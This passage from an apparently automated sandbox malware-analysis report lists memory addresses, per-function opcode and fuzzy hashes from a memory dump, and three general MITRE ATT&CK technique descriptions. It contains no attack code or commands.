0x008a2ace
0x008a2ad0
0x008a2ad4
0x008a2ad7
0x008a2ada
0x008a2ae1
0x008a2ae4
0x008a2aeb
0x008a2aee
0x008a2af5
0x008a2af8
0x008a2aff
0x008a2b02
0x008a2b09
0x008a2b0c
0x008a2b13
0x008a2b16
0x008a2b1d
0x008a2b20
0x008a2b27
0x008a2b2a
0x008a2b34
0x008a2b37
0x008a2b3b
0x008a2b3d
0x008a2b40
0x008a2b42
0x008a2b46
0x008a2b4b
0x008a2b4e
0x008a2b4e
0x008a2b55
0x008a2b5c
0x008a2b5c
0x008a29a5
0x008a2a4d
0x008a2a4d
0x008a2a5b
0x008a2a65
0x008a2a6e
0x008a2a7a
0x008a29ab
0x008a29b0
0x008a29b9
0x008a29be
0x008a29ca
0x008a2aa8
0x00000000
0x008a29d0
0x008a29d2
0x008a29ff
0x008a2a04
0x008a2a0a
0x008a2a0e
0x008a2a87
0x008a2a8e
0x008a2a94
0x008a2a94
0x008a2a87
0x008a2a12
0x00000000
0x008a2a14
0x008a2a1b
0x008a2a1e
0x00000000
0x008a2a1e
0x008a29d4
0x008a29d4
0x008a29d4
0x008a29d6
0x008a29d8
0x008a29e6
0x008a29e7
0x008a29ed
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x008a29ed
0x008a2a9b
0x008a2aa1
0x008a2a23
0x008a2a25
0x008a2a32
0x008a2a32
0x008a2a3f
0x008a2a48
0x00000000
0x008a2a27
0x008a2a2b
0x008a2a2c
0x008a2a30
0x008a2a31
0x008a2a31
0x008a2aa3
0x00000000
0x008a2aa3
0x00000000
0x008a29ef
0x008a29ef
0x008a29f5
0x008a29fb
0x00000000
0x008a29d4
0x008a29d2
0x008a29ca
0x00000000

Strings

8Z, xrefs: 008A2987, 008A2A32, 008A2A4D, 008A2B5C

Memory Dump Source

Source File: 00000004.00000002.2407055275.0000000000890000.00000040.00000001.sdmp, Offset: 00890000, based on PE: true

Similarity

API ID:
String ID: 8Z
API String ID: 0-2280653127
Opcode ID: bb50ac7159984596c85f86954f8e13fe47c66b22fdef3f1ff1ca594ecaca4b00
Instruction ID: 179461051412d109354d08b4fa07fdc291a93a8af6ed2ae73e24a13815011eaf
Opcode Fuzzy Hash: bb50ac7159984596c85f86954f8e13fe47c66b22fdef3f1ff1ca594ecaca4b00
Instruction Fuzzy Hash: 7841B3305542089BE724EF2CCC51BAA3765FF52700F48842CF946CBA92EF75AD45D7A2

Uniqueness

Uniqueness Score: -1.00%

Function 008B50A0, Relevance: .8, Instructions: 835COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2407055275.0000000000890000.00000040.00000001.sdmp, Offset: 00890000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8132493ed869d81ea9f5ab984da2c4f4fcac5c189bdde6216712a0318459efd1
Instruction ID: a3862c11114fb2f1f2d077766d7aa63e42ff124ce998f6c32bb3f80b5628f00c
Opcode Fuzzy Hash: 8132493ed869d81ea9f5ab984da2c4f4fcac5c189bdde6216712a0318459efd1
Instruction Fuzzy Hash: E8620374609B429FDB158F28C48076ABBE2FFC6310F18866DE895CB352EB75D941CB42

Uniqueness

Uniqueness Score: -1.00%

Function 008A5B60, Relevance: .8, Instructions: 810COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2407055275.0000000000890000.00000040.00000001.sdmp, Offset: 00890000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cda36dfe5ef8f5e1745eebe5072b417096267042991f5e1ea364a1e58f0fd1ce
Instruction ID: df80a0640021abc11d9fc29075950258795ab455b21fe42954c712bbfa5f1e44
Opcode Fuzzy Hash: cda36dfe5ef8f5e1745eebe5072b417096267042991f5e1ea364a1e58f0fd1ce
Instruction Fuzzy Hash: BF52B2316043019BE724EF28C891BAB73A5FF92304F18892DE595C7A96EF30D955CB63

Uniqueness

Uniqueness Score: -1.00%

Function 008B7FC0, Relevance: .7, Instructions: 711COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2407055275.0000000000890000.00000040.00000001.sdmp, Offset: 00890000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c76acd60678bb96f26b5e0d37bd27300dfdf6a640e895f3b9d1efbfc3318f078
Instruction ID: bb62cbc61ae370f90b77a2c895b4cee7168b077616518ab999e034f032909c7f
Opcode Fuzzy Hash: c76acd60678bb96f26b5e0d37bd27300dfdf6a640e895f3b9d1efbfc3318f078
Instruction Fuzzy Hash: 56322A71A09752CBD7258E3C88803AA7BDAFF96354F28866DD895DB391DE34CC41C782

Uniqueness

Uniqueness Score: -1.00%

Function 008A8EF0, Relevance: .7, Instructions: 697COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2407055275.0000000000890000.00000040.00000001.sdmp, Offset: 00890000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 37423c9d46a7c914545311d6de0227cd52b085ee836e5e2d8b0d06f668941822
Instruction ID: 346675038c9a3c86d617c89afe6a44766d0b1243f7ccd18636593f66ca14959a
Opcode Fuzzy Hash: 37423c9d46a7c914545311d6de0227cd52b085ee836e5e2d8b0d06f668941822
Instruction Fuzzy Hash: 6D22F671A09B2286FB244E3DC85133672E2FFD7350B298629E9E5CBA94FA35CC41C251

Uniqueness

Uniqueness Score: -1.00%

Function 008AD980, Relevance: .6, Instructions: 612COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2407055275.0000000000890000.00000040.00000001.sdmp, Offset: 00890000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c9b80bc0ef750c546063ff099eaab4663a469d234785f02f077b4f6bdfd9e77d
Instruction ID: e2f5ac2517d8bdc831aab8252c35be2021e13896c474043946a6924e60441a3e
Opcode Fuzzy Hash: c9b80bc0ef750c546063ff099eaab4663a469d234785f02f077b4f6bdfd9e77d
Instruction Fuzzy Hash: 4C22E4756047128BEB248F29C84162AB3E2FFD6750F19C52CE896CBE94EB70DC51C792

Uniqueness

Uniqueness Score: -1.00%

Function 008BFA10, Relevance: .6, Instructions: 569COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2407055275.0000000000890000.00000040.00000001.sdmp, Offset: 00890000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ce14b715fc7bfa144c9e1b309854171ce7f8f80ada1d040dd77f6dcee38911bf
Instruction ID: e5824ec339c9b283f416d33582e1bfdd81043f7bcdf812f1ccfa8ce7679de038
Opcode Fuzzy Hash: ce14b715fc7bfa144c9e1b309854171ce7f8f80ada1d040dd77f6dcee38911bf
Instruction Fuzzy Hash: 8612AA356047019BE728CF19C880B6AB7E1FFC5754F18892DEA85D7746EB70E884CB92

Uniqueness

Uniqueness Score: -1.00%

Function 008ABF50, Relevance: .5, Instructions: 542COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2407055275.0000000000890000.00000040.00000001.sdmp, Offset: 00890000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e5d19c950d3206712b1004c452d88e64ae12569de0aad1d6093721ce458abcaa
Instruction ID: b4d8b5be96d9cf788bc40400de57d20dbf7277a278b57a6713fe1e1a5fdf17e4
Opcode Fuzzy Hash: e5d19c950d3206712b1004c452d88e64ae12569de0aad1d6093721ce458abcaa
Instruction Fuzzy Hash: B7121375A047128BEB248F29C49063A73E2FFDA710B18C62DE891CBB95EB35DC41C391

Uniqueness

Uniqueness Score: -1.00%

Function 0089CA10, Relevance: .5, Instructions: 479COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2407055275.0000000000890000.00000040.00000001.sdmp, Offset: 00890000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dadf6844ec3758e03c6f7083a9cc0081a3faab2b917400b9af9415339571736d
Instruction ID: f50bbf4be19406be604dba794ad08cb34e7239d2f9b98a29fa0058759bdb468d
Opcode Fuzzy Hash: dadf6844ec3758e03c6f7083a9cc0081a3faab2b917400b9af9415339571736d
Instruction Fuzzy Hash: 95F1AE71A042145BCB10BF29C8926AE77E6FFD6750F14092DF696C73A2DA31EC05CB92

Uniqueness

Uniqueness Score: -1.00%

Function 0089F9A0, Relevance: .5, Instructions: 473COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2407055275.0000000000890000.00000040.00000001.sdmp, Offset: 00890000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d660f56c1f9ece7688e948068c834f38dca591276ed273b3e8a330a8d68dc6fd
Instruction ID: c9a1ab0d5cd9a9d90910e1369d6e5e314c0dba3591f8dbf18b52fe12c4cf1223
Opcode Fuzzy Hash: d660f56c1f9ece7688e948068c834f38dca591276ed273b3e8a330a8d68dc6fd
Instruction Fuzzy Hash: 08F17D71A042195BCB04BF28C8926AE77A5FB97314F154A3DF69AC7392DB30EC05C792

Uniqueness

Uniqueness Score: -1.00%

Function 008BD620, Relevance: .4, Instructions: 432COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2407055275.0000000000890000.00000040.00000001.sdmp, Offset: 00890000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 98885a744d3127c7762a2a279bce05cd031e0a7a05528f0be07d845d9a8daca9
Instruction ID: 202a4fe9e6f73536d50afab406bdc2aabf6e5e4d70da5ef09017fe601ebe10c0
Opcode Fuzzy Hash: 98885a744d3127c7762a2a279bce05cd031e0a7a05528f0be07d845d9a8daca9
Instruction Fuzzy Hash: 61E1142EE38FD919E313853EA4037B7B7445FF72C8F02E727B48471A92EB6556826148

Uniqueness

Uniqueness Score: -1.00%

Function 008AF6E0, Relevance: .4, Instructions: 392COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2407055275.0000000000890000.00000040.00000001.sdmp, Offset: 00890000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e006c971f38375c05edabab16e11e46f87f3c9b366a4f754ddcc0e1bc444f7c1
Instruction ID: 523bbbf805444dc1a5e4127c41b2c88ce75f95aa93acf1d304a47e946785a86f
Opcode Fuzzy Hash: e006c971f38375c05edabab16e11e46f87f3c9b366a4f754ddcc0e1bc444f7c1
Instruction Fuzzy Hash: C2C14B71A0072286F7244FA9C45063772E2FFD6754B29C73DDA96CBA96FB34CC428251

Uniqueness

Uniqueness Score: -1.00%

Function 008A7FC0, Relevance: .4, Instructions: 351COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2407055275.0000000000890000.00000040.00000001.sdmp, Offset: 00890000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4f61ebe9e8cbaa3200c9dacce0d43bb52dd950b082ddfb78a9de9225987a4258
Instruction ID: d247366b7304e5b6dc0563fc7e97dc6452b37a88ffbd8d6615748c6b3660199c
Opcode Fuzzy Hash: 4f61ebe9e8cbaa3200c9dacce0d43bb52dd950b082ddfb78a9de9225987a4258
Instruction Fuzzy Hash: 7EB16D75905B52D6FB258A2D885033BBAD2FFC3710F1CC66DD8959BB85DE358C0183A2

Uniqueness

Uniqueness Score: -1.00%

Function 008A83C0, Relevance: .3, Instructions: 343COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2407055275.0000000000890000.00000040.00000001.sdmp, Offset: 00890000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b8b876869e6e1399d07086898aa747f3fd665ccaa3c4c619e8c8968fd6a9a47e
Instruction ID: 5581d9ac00e81885b18da46671505248d9760f84adf6161cb64de539c4b8bfe9
Opcode Fuzzy Hash: b8b876869e6e1399d07086898aa747f3fd665ccaa3c4c619e8c8968fd6a9a47e
Instruction Fuzzy Hash: C9B124B5A05712C6FB284F29889173B72D1FF96350F29862DED56DBB85EF708C0082A5

Uniqueness

Uniqueness Score: -1.00%

Function 008AE3F0, Relevance: .3, Instructions: 317COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2407055275.0000000000890000.00000040.00000001.sdmp, Offset: 00890000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 57480cebb6c073643066db0bb37664f53f528b12d2ca4e8ceeab76096e5db0d9
Instruction ID: 6a08ebbd124fc6707c44df5a1fa0062f92319154e09f6204a015a8c6b34bea16
Opcode Fuzzy Hash: 57480cebb6c073643066db0bb37664f53f528b12d2ca4e8ceeab76096e5db0d9
Instruction Fuzzy Hash: CFC1B1B4A047028BE714CF29C49072AB7E1FF9A304F188A2CE995CBB51E735D955CB92

Uniqueness

Uniqueness Score: -1.00%

Function 008BD180, Relevance: .3, Instructions: 307COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2407055275.0000000000890000.00000040.00000001.sdmp, Offset: 00890000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2c4affb0b97e9a92ad5c319a7318a59f7f89af0f3b98c73a12dbfb66936e14af
Instruction ID: a277b24b0a815fc070f5961acaecf05a8d74ab63a6a59037789d00cb210408d5
Opcode Fuzzy Hash: 2c4affb0b97e9a92ad5c319a7318a59f7f89af0f3b98c73a12dbfb66936e14af
Instruction Fuzzy Hash: 5DD1AF3110D3E45AC325AB2A94907EFFFD1AFE6304F18887DE8C592382D5789645DBA3

Uniqueness

Uniqueness Score: -1.00%

Function 008B3B00, Relevance: .3, Instructions: 307COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2407055275.0000000000890000.00000040.00000001.sdmp, Offset: 00890000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 769dd45fdfd1994aa2fcb50dbb8a97899a61763fb7daf8420eb3df3334b3789f
Instruction ID: 72f964202e8173a8a79d56c667961c509a05610110c969ec0b21026171839564
Opcode Fuzzy Hash: 769dd45fdfd1994aa2fcb50dbb8a97899a61763fb7daf8420eb3df3334b3789f
Instruction Fuzzy Hash: 1CC1D0746087428FD725CF28C4407AABBE2FF85710F188A1EE895DB351E731EA45CB92

Uniqueness

Uniqueness Score: -1.00%

Function 008A67C8, Relevance: .3, Instructions: 304COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2407055275.0000000000890000.00000040.00000001.sdmp, Offset: 00890000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b94d1273dcc4b5e7acce49fbc1470cd270e18fb174676b566cf93b67178fcbc7
Instruction ID: 25e7c0b5ea8cfade29029b9b74df9753e56e5e2370e8850f5a378f9540c848d0
Opcode Fuzzy Hash: b94d1273dcc4b5e7acce49fbc1470cd270e18fb174676b566cf93b67178fcbc7
Instruction Fuzzy Hash: 10C1C4706043498BE730DF69D490B6B77E0FB96318F18C42DC889CB64AFB749855CB91

Uniqueness

Uniqueness Score: -1.00%

Function 008BDCA0, Relevance: .3, Instructions: 297COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2407055275.0000000000890000.00000040.00000001.sdmp, Offset: 00890000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 19572c1b798058c94cd4207bb43ad0dad04bb55abc297bd6c07a84037ab5eab7
Instruction ID: 04228aac0e424f2c858f4b71a6ec5288473832454a88b1a05f33c61ced218724
Opcode Fuzzy Hash: 19572c1b798058c94cd4207bb43ad0dad04bb55abc297bd6c07a84037ab5eab7
Instruction Fuzzy Hash: 70C1932120C3955AC325AB3994902BFBFE1AFE6204F188D7DE4D987393D578C984D7A3

Uniqueness

Uniqueness Score: -1.00%

Function 008B9B10, Relevance: .3, Instructions: 292COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2407055275.0000000000890000.00000040.00000001.sdmp, Offset: 00890000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2b3f2147b2cc6a45cacde8172b76a812e1dc6d3a0f11a4114b2f5da289a2e1a0
Instruction ID: 95ce16b7bf2975e40b537623f4524cea720f53c26dcc2aee4b8faa7f4dc54d7a
Opcode Fuzzy Hash: 2b3f2147b2cc6a45cacde8172b76a812e1dc6d3a0f11a4114b2f5da289a2e1a0
Instruction Fuzzy Hash: FBA11471A047069BD700DF19CC8069AFBA2FFC4314F14CA2DEA9887745E771AD658BD2

Uniqueness

Uniqueness Score: -1.00%

Function 008A7564, Relevance: .3, Instructions: 278COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2407055275.0000000000890000.00000040.00000001.sdmp, Offset: 00890000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 515ac046b00ad08434ac6c587b3976bc9c924d5c19ca2dd09f796936f18f1cf6
Instruction ID: 641d37c8fdc3784341658ee481216d47cc69055bc2c8eed8336acdff2e12c261
Opcode Fuzzy Hash: 515ac046b00ad08434ac6c587b3976bc9c924d5c19ca2dd09f796936f18f1cf6
Instruction Fuzzy Hash: 7BA1B271A0CA058BF724DF1D9C84B6AB3A2FBA6314F28C539D449CBB11EB749C41E791

Uniqueness

Uniqueness Score: -1.00%

Function 008B71F0, Relevance: .3, Instructions: 277COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2407055275.0000000000890000.00000040.00000001.sdmp, Offset: 00890000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2d429c3ac184809212723adcbd6e746b65124195a74a52075ee5fe463380fc44
Instruction ID: 482ffa13328fa47fbd9fcda43063a54ec376688fe9c18a2bae5c54acbed7cad7
Opcode Fuzzy Hash: 2d429c3ac184809212723adcbd6e746b65124195a74a52075ee5fe463380fc44
Instruction Fuzzy Hash: F0B179B460C7428BD719CF29C4407AABBE1FBC9310F188A6DE895DB351E735D946CB82

Uniqueness

Uniqueness Score: -1.00%

Function 008AE0A0, Relevance: .3, Instructions: 273COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2407055275.0000000000890000.00000040.00000001.sdmp, Offset: 00890000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 74a8e911a4f29a8feecf1261f1edd226c0157e3f3747d79cfe280e31a92c4aa2
Instruction ID: b29fd323477815b2f32510c4f61b91d11c81359db28964aea8a35770ac8d48fb
Opcode Fuzzy Hash: 74a8e911a4f29a8feecf1261f1edd226c0157e3f3747d79cfe280e31a92c4aa2
Instruction Fuzzy Hash: 3FA17AB19057128BEB24CF29C94062BB7E2FFC6710F18CA2DE8959B754E731DD058B92

Uniqueness

Uniqueness Score: -1.00%

Function 008AFDD0, Relevance: .2, Instructions: 240COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2407055275.0000000000890000.00000040.00000001.sdmp, Offset: 00890000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c31f9b7cdb9490313d3b63a32406192f5372d33359b2d824e6fbf98519c66a29
Instruction ID: 4d5b9f6641621d1055cb13211000076757b4bdecf59714c293a78f1097f530eb
Opcode Fuzzy Hash: c31f9b7cdb9490313d3b63a32406192f5372d33359b2d824e6fbf98519c66a29
Instruction Fuzzy Hash: B781E1716047018BE714CF29C48022BB3E2FFD9354F29C62DE594DB7A2EB75D8518B82

Uniqueness

Uniqueness Score: -1.00%

Function 008B0220, Relevance: .2, Instructions: 232COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2407055275.0000000000890000.00000040.00000001.sdmp, Offset: 00890000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2db77dfe83392df997fdca982a5963f1cf45e072480f6015c9e3b136aec9b8fb
Instruction ID: 4f793097bbf5d84e94b365aa9ad7e37aa6279f07e44cd55127d3f0fda10fbb77
Opcode Fuzzy Hash: 2db77dfe83392df997fdca982a5963f1cf45e072480f6015c9e3b136aec9b8fb
Instruction Fuzzy Hash: 46712571A0471287CB284E29C4912BB72D2FFD5764B29832CEAA6C73E1FB30DC55CA45

Uniqueness

Uniqueness Score: -1.00%

Function 008B5CB0, Relevance: .2, Instructions: 230COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2407055275.0000000000890000.00000040.00000001.sdmp, Offset: 00890000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: aff05f55cec81c8cbb89bb9310e4807102455aae407b6acccf268787ed05e4ff
Instruction ID: ffc4061777fb1089737fd9c02625d6ac1cb45a73bf980492b19eb8053c42d641
Opcode Fuzzy Hash: aff05f55cec81c8cbb89bb9310e4807102455aae407b6acccf268787ed05e4ff
Instruction Fuzzy Hash: 3381C670608B414BD729CF28C48036ABBE2FFD5314F18866DE496CB395DB75D945CB82

Uniqueness

Uniqueness Score: -1.00%

Function 008A98DA, Relevance: .2, Instructions: 220COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2407055275.0000000000890000.00000040.00000001.sdmp, Offset: 00890000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7357bc719a5f8a0238a45c1f77690d5ed0b164abf6199a0695743211be5b7034
Instruction ID: 63cc0161dc4ad2e125527648b7dab330287f5e1db08916b1d5ebbad5298064d3
Opcode Fuzzy Hash: 7357bc719a5f8a0238a45c1f77690d5ed0b164abf6199a0695743211be5b7034
Instruction Fuzzy Hash: 22612A65A0873196FB248E2D889163772E2FFC3750B1DC22ED9D6CBA98FB319C418351

Uniqueness

Uniqueness Score: -1.00%

Function 008AA0D0, Relevance: .2, Instructions: 211COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2407055275.0000000000890000.00000040.00000001.sdmp, Offset: 00890000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 72a2b18218923bf33894fb5388b3e17f43bda03b1264e169f2468f23ea404246
Instruction ID: 6f3f7439690ac44ac6a32e1eecb42de9afd17a64863995a0ed90b65a61c77db5
Opcode Fuzzy Hash: 72a2b18218923bf33894fb5388b3e17f43bda03b1264e169f2468f23ea404246
Instruction Fuzzy Hash: 6561267290471287EB2C4F18C49163AB3A1FF86750F1A832DDD56CBF90EB369C61C292

Uniqueness

Uniqueness Score: -1.00%

Function 008A9E70, Relevance: .2, Instructions: 211COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2407055275.0000000000890000.00000040.00000001.sdmp, Offset: 00890000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0d781025913a76f35b518d42bb9011f93251b6c056899b775aa9060b1c0e66a9
Instruction ID: 6669c45b3f3cf9aa92fbfddc1f7b89ebf8fb76fded7f2cbb4655650f7ca71d86
Opcode Fuzzy Hash: 0d781025913a76f35b518d42bb9011f93251b6c056899b775aa9060b1c0e66a9
Instruction Fuzzy Hash: AC615A72508712CBE7288F19C491A2BB3A1FF86350B15836DE995CBE91EF729C51C3D2

Uniqueness

Uniqueness Score: -1.00%

Function 008B1020, Relevance: .2, Instructions: 201COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2407055275.0000000000890000.00000040.00000001.sdmp, Offset: 00890000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ae64409f2d16467f71373ee2bf306acfd33e073002edd05b5c76f8db5368782a
Instruction ID: c28a7d21ef99159669633c68527e5fcee3f57d4a3157decf82bbbb85cdd88cc6
Opcode Fuzzy Hash: ae64409f2d16467f71373ee2bf306acfd33e073002edd05b5c76f8db5368782a
Instruction Fuzzy Hash: A1612C2560879257DF21CA6D88E43A77AA6FF92304F9CC269CD518F34ADA728C42C7C1

Uniqueness

Uniqueness Score: -1.00%

Function 008B1240, Relevance: .2, Instructions: 201COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2407055275.0000000000890000.00000040.00000001.sdmp, Offset: 00890000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 099fc12331ff022561492b18087020d9d8d5b8bf08d513a05c8e731bfd20c05d
Instruction ID: 72baddccf0b60eb63ef9559a613371ad7a326a717c2da52384e5b9a6b43d1e78
Opcode Fuzzy Hash: 099fc12331ff022561492b18087020d9d8d5b8bf08d513a05c8e731bfd20c05d
Instruction Fuzzy Hash: F3614D2560879157DF21CA6984E43AA7AE6FF96304F9CC26DCC51CF38AEA768C41C3C1

Uniqueness

Uniqueness Score: -1.00%

Function 008A8CC0, Relevance: .2, Instructions: 194COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2407055275.0000000000890000.00000040.00000001.sdmp, Offset: 00890000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3d139eb4d573b3b3d1014b080c0fd1ab8e66937a0c43eb19ae496f21c9fb69d1
Instruction ID: d616d5acb63cea98565009a1bb815be23a2f6a5e8010260bc4ae834712a3292a
Opcode Fuzzy Hash: 3d139eb4d573b3b3d1014b080c0fd1ab8e66937a0c43eb19ae496f21c9fb69d1
Instruction Fuzzy Hash: 61510A61A05712C6FB244F29C88163772A2FFE2750B29C23CD996C7B95FF758C61C261

Uniqueness

Uniqueness Score: -1.00%

Function 008A8AB0, Relevance: .2, Instructions: 184COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2407055275.0000000000890000.00000040.00000001.sdmp, Offset: 00890000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 10a3c9910ea41fd533c8730267ed1528ca8aaa2e9f90d5bc588d437e70140cb2
Instruction ID: 0e6cb1ef1c368f769eaeffa705a3b4d3997d43c539c6bd08209c0142e555d449
Opcode Fuzzy Hash: 10a3c9910ea41fd533c8730267ed1528ca8aaa2e9f90d5bc588d437e70140cb2
Instruction Fuzzy Hash: 67514BE1A01B12C6F7684F29888163772A2FFD2360B19C23DD996C7B55FF7588118671

Uniqueness

Uniqueness Score: -1.00%

Function 008A88C0, Relevance: .2, Instructions: 182COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2407055275.0000000000890000.00000040.00000001.sdmp, Offset: 00890000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0462b3abe644d686df3d15cf7fea5482de025a1b1b951e707ee8700216b69174
Instruction ID: cf4f600ef3d2f749f25925f67ed28ff3293ec1926c723236788062130c1f0553
Opcode Fuzzy Hash: 0462b3abe644d686df3d15cf7fea5482de025a1b1b951e707ee8700216b69174
Instruction Fuzzy Hash: 1C5127A1A00B22C6F7284E29885163776E2FFD6350B2DC23DD996C7A95FF319811C263

Uniqueness

Uniqueness Score: -1.00%

Function 008BCEF8, Relevance: .2, Instructions: 153COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2407055275.0000000000890000.00000040.00000001.sdmp, Offset: 00890000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fcbcf9705e709eb844b646129b4b55cf383a25db1a3ec8ef676bcb8762ebb863
Instruction ID: e64a5a302e23a03eeb4383233b6f6b25d13cc01cf5950f4264bb4fde9c463c19
Opcode Fuzzy Hash: fcbcf9705e709eb844b646129b4b55cf383a25db1a3ec8ef676bcb8762ebb863
Instruction Fuzzy Hash: 8741B37160461A65EF309E2998807FE2793FF61798F1440A6FD40C9384EFB6CC82E291

Uniqueness

Uniqueness Score: -1.00%

Function 008A96D0, Relevance: .2, Instructions: 151COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2407055275.0000000000890000.00000040.00000001.sdmp, Offset: 00890000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b175748cf7301ee0c6ed0bf10d9d1cc7f3f0d81bd195dc22fade8a8467494fda
Instruction ID: cc2403a7190aa3002aa66f524f74bc999a82d83fb3eab885cc6ebee61bc947e5
Opcode Fuzzy Hash: b175748cf7301ee0c6ed0bf10d9d1cc7f3f0d81bd195dc22fade8a8467494fda
Instruction Fuzzy Hash: 5041177291862583EB244F2DC891626B295FF96360F25833DEDE6C7BD0FB358C51C2A1

Uniqueness

Uniqueness Score: -1.00%

Function 008BBE30, Relevance: .0, Instructions: 39COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2407055275.0000000000890000.00000040.00000001.sdmp, Offset: 00890000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 76f6433e3c74a3447e8eaa2ba15ee16424b61191432471d824bdce721637ee07
Instruction ID: ff1c4c51b2c437c51458e9e29fb95c122d8516f26380fd7e3d2ef36d23f3317b
Opcode Fuzzy Hash: 76f6433e3c74a3447e8eaa2ba15ee16424b61191432471d824bdce721637ee07
Instruction Fuzzy Hash: F4F0A738604503AAFF255E798C80BE732D8FF46394F184665B612D63B5FFA1DC009522

Uniqueness

Uniqueness Score: -1.00%

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	API monitoring, Loaded DLLs, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.
Tactics:	Execution
Data Sources:	Anti-virus, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

